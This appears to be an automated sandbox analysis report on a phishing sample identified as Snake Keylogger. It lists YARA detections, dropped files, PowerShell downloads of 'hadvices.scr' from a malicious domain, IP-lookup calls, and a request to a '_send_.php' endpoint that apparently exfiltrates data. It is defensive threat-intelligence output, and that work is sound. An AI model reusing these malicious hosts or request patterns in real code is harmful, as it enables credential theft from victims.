Source: Yara match	File source: 0.0.Payment_Advice.scr.exe.7b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.hadvices.scr.3b88420.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.hadvices.scr.3b679f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Windows\Temp\hadvices.scr, type: DROPPED

Source: global traffic

TCP traffic: 192.168.2.6:49750 -> 108.167.142.65:587

Source: global traffic	HTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.21.67.152 104.21.67.152
Source: Joe Sandbox View	IP Address: 172.67.169.18 172.67.169.18
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

Source: Joe Sandbox View

ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: checkip.dyndns.org

Source: global traffic

TCP traffic: 192.168.2.6:49750 -> 108.167.142.65:587

Source: global traffic	HTTP traffic detected: GET /hsbc/Payment_Advice.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: advising-receipts.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /hsbc/hadvices.scr HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: advising-receipts.com
Source: global traffic	HTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.6:49731 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /hsbc/Payment_Advice.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: advising-receipts.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /hsbc/hadvices.scr HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: advising-receipts.com
Source: global traffic	HTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
Source: global traffic	HTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: advising-receipts.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: scratchdreams.tk
Source: global traffic	DNS traffic detected: DNS query: mail.qoldenfrontier.com

Source: powershell.exe, 00000004.00000002.2327709883.00000216815DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2327709883.0000021681AD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://advising-receipts.com
Source: hadvices.scr, 00000010.00000002.3360095396.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BDA000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BF5000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BCD000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002B3A000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: hadvices.scr, 00000010.00000002.3360095396.0000000002C03000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BDA000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BF5000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BCD000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002B3A000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002B7D000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BE8000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002B2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: hadvices.scr, 00000010.00000002.3360095396.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: hadvices.scr, 0000000F.00000002.2334857873.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3355386659.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: hadvices.scr, 00000010.00000002.3366127698.0000000006070000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: svchost.exe, 00000008.00000002.3360378918.0000024E1A200000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.8.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: hadvices.scr, 00000010.00000002.3360095396.0000000002D4C000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002D63000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002D7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.qoldenfrontier.com
Source: powershell.exe, 00000004.00000002.2381622026.000002169006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2381622026.00000216901B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.2327709883.0000021680233000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: hadvices.scr, 00000010.00000002.3360095396.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BDA000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BF5000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BCD000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002B52000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: powershell.exe, 00000004.00000002.2327709883.0000021680001000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: hadvices.scr, 00000010.00000002.3360095396.0000000002C3F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://scratchdreams.tk
Source: powershell.exe, 00000004.00000002.2327709883.0000021680233000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: wscript.exe, 00000003.00000002.2417316858.000001FA96795000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://adviF.0
Source: powershell.exe, 00000004.00000002.2327709883.00000216817FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2327709883.0000021680C33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://advising-receipts.com
Source: powershell.exe, 00000004.00000002.2404129880.00000216F7210000.00000004.00000020.00020000.00000000.sdmp, 4A6E.vbs.2.dr	String found in binary or memory: https://advising-receipts.com/hsbc/Payment_Advice.pdf
Source: powershell.exe, 00000004.00000002.2404129880.00000216F7210000.00000004.00000020.00020000.00000000.sdmp, 4A6E.vbs.2.dr	String found in binary or memory: https://advising-receipts.com/hsbc/hadvices.scr
Source: powershell.exe, 00000004.00000002.2327709883.0000021680001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.2381622026.00000216901B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.2381622026.00000216901B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.2381622026.00000216901B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: edb.log.8.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000008.00000003.2178173625.0000024E19FB0000.00000004.00000800.00020000.00000000.sdmp, edb.log.8.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 00000004.00000002.2327709883.0000021680233000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.2327709883.0000021680C33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.2381622026.000002169006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2381622026.00000216901B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: hadvices.scr, 00000010.00000002.3360095396.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BDA000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BF5000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BCD000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002B3A000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002B7D000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: hadvices.scr, 0000000F.00000002.2334857873.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3355386659.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002B3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: hadvices.scr, 00000010.00000002.3360095396.0000000002BE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/149.18.24.96
Source: hadvices.scr, 00000010.00000002.3360095396.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BDA000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BF5000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BCD000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002B7D000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002BE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/149.18.24.96$
Source: hadvices.scr, 00000010.00000002.3360095396.0000000002BF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.orgp
Source: hadvices.scr, 0000000F.00000002.2334857873.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3355386659.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002C3F000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scratchdreams.tk
Source: hadvices.scr, 00000010.00000002.3360095396.0000000002C3F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scratchdreams.tk/_send_.php?TS

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 104.21.27.63:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.169.18:443 -> 192.168.2.6:49745 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.Payment_Advice.scr.exe.2ce1910.1.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 15.2.hadvices.scr.3ad3d90.4.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 0.2.Payment_Advice.scr.exe.50e0000.4.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 0.2.Payment_Advice.scr.exe.2ce1910.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 0.2.Payment_Advice.scr.exe.3c2e590.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 0.2.Payment_Advice.scr.exe.50e0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 15.2.hadvices.scr.4fc0000.5.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 0.2.Payment_Advice.scr.exe.3c2e590.3.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 15.2.hadvices.scr.3b679f0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 15.2.hadvices.scr.3b679f0.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.2.hadvices.scr.3b679f0.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.2.hadvices.scr.3b679f0.3.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 16.2.hadvices.scr.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.hadvices.scr.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.hadvices.scr.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.2.hadvices.scr.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 15.2.hadvices.scr.3b88420.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 15.2.hadvices.scr.3b88420.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.2.hadvices.scr.3b88420.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.2.hadvices.scr.3b88420.2.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 15.2.hadvices.scr.3b88420.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 15.2.hadvices.scr.3b88420.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.2.hadvices.scr.3b88420.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.2.hadvices.scr.3b88420.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 15.2.hadvices.scr.3b679f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 15.2.hadvices.scr.3b679f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.2.hadvices.scr.3b679f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.2.hadvices.scr.3b679f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.Payment_Advice.scr.exe.2c01dc8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 15.2.hadvices.scr.2a91ca0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 0.2.Payment_Advice.scr.exe.2bff588.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 15.2.hadvices.scr.2a8f460.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 00000010.00000002.3355386659.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000010.00000002.3355386659.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.2102466582.00000000050E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects downloader injector Author: ditekSHen
Source: 0000000F.00000002.2334857873.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000F.00000002.2334857873.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: hadvices.scr PID: 8112, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: hadvices.scr PID: 8112, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: hadvices.scr PID: 5648, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: hadvices.scr PID: 5648, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Payment_Advice.scr.exe

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Windows\Temp\hadvices.scr

